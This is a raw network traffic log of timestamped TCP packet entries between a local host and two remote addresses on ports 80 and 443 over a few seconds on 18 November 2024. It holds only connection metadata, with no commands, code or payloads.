                                                                                                                                                  Nov 18, 2024 18:21:31.033346891 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.033361912 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.033394098 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.033401012 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.033401966 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.033427000 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.033433914 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.033447027 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.033468008 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.034254074 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.034356117 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.034425974 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.158740044 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.158751965 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.158767939 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.158854008 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.158859015 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.158869982 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.158905983 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.159220934 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.159229040 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.159244061 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.159250021 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.159261942 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.159275055 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.159286022 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.159301043 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.160057068 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.160106897 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.160590887 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.164371967 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.193877935 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.193902969 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.194032907 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.267564058 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.267579079 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.267709970 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.267721891 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.267729998 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.267743111 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.267755985 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.267764091 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.267771006 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.267808914 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.267828941 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.268788099 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.268800974 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.268816948 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.268822908 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.268865108 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.268881083 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.269396067 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.269402027 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.269412994 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.269418955 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.269444942 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.269465923 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.310596943 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.310691118 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.310973883 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.376013994 CET49163443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:31.376046896 CET443491635.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.376235962 CET49163443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:31.384624004 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.384644985 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.384651899 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.384702921 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.384718895 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.384727955 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.384732008 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.384768009 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.384967089 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.384974957 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.384990931 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.384996891 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.385034084 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.385060072 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.385580063 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.385600090 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.385607004 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.385648966 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.385652065 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.385656118 CET8049162107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:31.385694981 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.387419939 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.387640953 CET4916280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:31.395808935 CET49163443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:31.395827055 CET443491635.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:32.276851892 CET443491635.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:32.276993036 CET49163443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:32.284301996 CET49163443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:32.284328938 CET443491635.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:32.284893990 CET443491635.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:32.284992933 CET49163443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:32.383580923 CET49163443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:32.431328058 CET443491635.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:32.778671026 CET443491635.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:32.778753042 CET443491635.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:32.778752089 CET49163443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:32.779100895 CET49163443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:32.780015945 CET49163443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:32.780045986 CET443491635.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:32.789527893 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:32.795670986 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:32.795738935 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:32.795922995 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:32.806390047 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.487416983 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.487498045 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.487504959 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.487519979 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.487544060 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.487564087 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.487843037 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.487879038 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.487890959 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.487899065 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.487915039 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.487941027 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.488842964 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.488862991 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.488897085 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.488909960 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.488934040 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.489988089 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.490031958 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.492578030 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.492635012 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.492683887 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.492729902 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.512582064 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.604878902 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.604912996 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.604973078 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.605122089 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.605142117 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.605190039 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.605614901 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.605726004 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.606065035 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.606085062 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.606103897 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.606115103 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.606137991 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.607181072 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.607220888 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.607237101 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.607244968 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.607278109 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.607487917 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.607527018 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.721729040 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.721870899 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.721884012 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.721904039 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.721942902 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.722429991 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.722484112 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.722680092 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.722757101 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.723087072 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.723093033 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.723109007 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.723140955 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.723156929 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.723788023 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.723798990 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.723830938 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.724219084 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.724225998 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.724236965 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.724268913 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.725131989 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.725138903 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.725183964 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.864638090 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.864722013 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.864759922 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.864799023 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.864809036 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.864896059 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.865326881 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.865345955 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.865365028 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.865401983 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.865438938 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.866288900 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.866307974 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.866326094 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.866353989 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.866385937 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.867177010 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.867196083 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.867213964 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.867223024 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.867232084 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.867255926 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.867285967 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.868072987 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.868092060 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.868138075 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.978095055 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.978189945 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.978240967 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.978264093 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.978293896 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.978313923 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.978697062 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.978717089 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.978774071 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.979010105 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.979053974 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.979058981 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.979079008 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.979114056 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.979125977 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.979150057 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.979988098 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.980036020 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.980077028 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.980142117 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.980365038 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.980384111 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.980418921 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.980432987 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.980505943 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.981002092 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.981021881 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.981039047 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:33.981084108 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:33.981084108 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.094922066 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.094994068 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.095027924 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.095053911 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.095078945 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.095089912 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.095403910 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.095423937 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.095464945 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.095480919 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.095505953 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.096259117 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.096308947 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.096330881 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.096370935 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.096580029 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.096637011 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.096640110 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.096682072 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.096734047 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.097346067 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.097357035 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.097363949 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.097393036 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.097404003 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.098239899 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.098248959 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.098294020 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.208280087 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.208287954 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.208394051 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.212852001 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.212920904 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.212969065 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.212975979 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.213031054 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.213422060 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.213428020 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.213485956 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.213886023 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.213900089 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.213943005 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.214349031 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.214354992 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.214365005 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.214406967 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.215044975 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.215050936 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.215058088 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.215064049 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.215100050 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.215121984 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.215878963 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.215934038 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.269481897 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.269622087 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.269629002 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.269732952 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.269732952 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.329190016 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.329309940 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.329317093 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.329349995 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.329422951 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.329715014 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.329721928 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.329777956 CET4916480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:34.330087900 CET8049164107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:34.330104113 CET8049164107.172.44.178192.168.2.22
